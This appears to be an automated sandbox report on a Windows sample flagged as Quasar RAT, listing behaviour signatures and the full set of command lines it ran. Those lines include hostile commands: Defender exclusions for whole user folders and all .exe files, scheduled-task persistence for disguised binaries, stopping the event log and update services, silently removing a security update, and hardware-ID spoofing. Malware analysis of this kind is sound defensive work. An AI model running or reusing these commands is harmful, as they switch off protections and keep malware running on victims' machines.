Analysis Overview
SHA256
01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f
Threat Level: Known bad
The file 0c0dc0cf41e3c993ae5a22803275949a.bin was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Process spawned unexpected child process
Nirsoft
Stops running service(s)
Creates new service(s)
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Runs ping.exe
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-30 01:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-30 01:01
Reported
2023-12-30 01:04
Platform
win7-20231215-en
Max time kernel
1s
Max time network
149s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3048 wrote to memory of 2400 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 3048 wrote to memory of 2400 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 3048 wrote to memory of 2400 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 3048 wrote to memory of 2400 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 3048 wrote to memory of 2216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\conhost.exe |
| PID 3048 wrote to memory of 2216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\conhost.exe |
| PID 3048 wrote to memory of 2216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\conhost.exe |
| PID 3048 wrote to memory of 2216 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\conhost.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RUS8-8RRZ
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\463aa442-9b96-11ee-b087-e6b52eba4e86\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoof" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Public\smss.exe'" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9Y1lSkPD5j.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe'
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\463aa442-9b96-11ee-b087-e6b52eba4e86\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\lsm.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Cursors\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Cursors\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoofH" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoofH" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Recovery\463aa442-9b96-11ee-b087-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\463aa442-9b96-11ee-b087-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RUS8-8RRZ
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711451HP-TRGT9584MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311451HP-TRGT9584DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611451HP-TRGT9584FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411451HP-TRGT9584FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511451HP-TRGT9584SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811451HP-TRGT9584SG
C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe
"C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211451HP-TRGT9584RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11451HP-TRGT9584AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511467HP-TRGT30558SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611467HP-TRGT30558FU
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711467HP-TRGT30558MST
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311467HP-TRGT30558DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411467HP-TRGT30558FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811467HP-TRGT30558SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211467HP-TRGT30558RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11467HP-TRGT30558AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211483HP-TRGT18764RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711483HP-TRGT18764MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611483HP-TRGT18764FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311483HP-TRGT18764DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411483HP-TRGT18764FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511483HP-TRGT18764SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811483HP-TRGT18764SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11483HP-TRGT18764AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NB5N-OF1P
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NB5N-OF1P
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TP2O-C4B5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TP2O-C4B5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: OGMZ-29J5
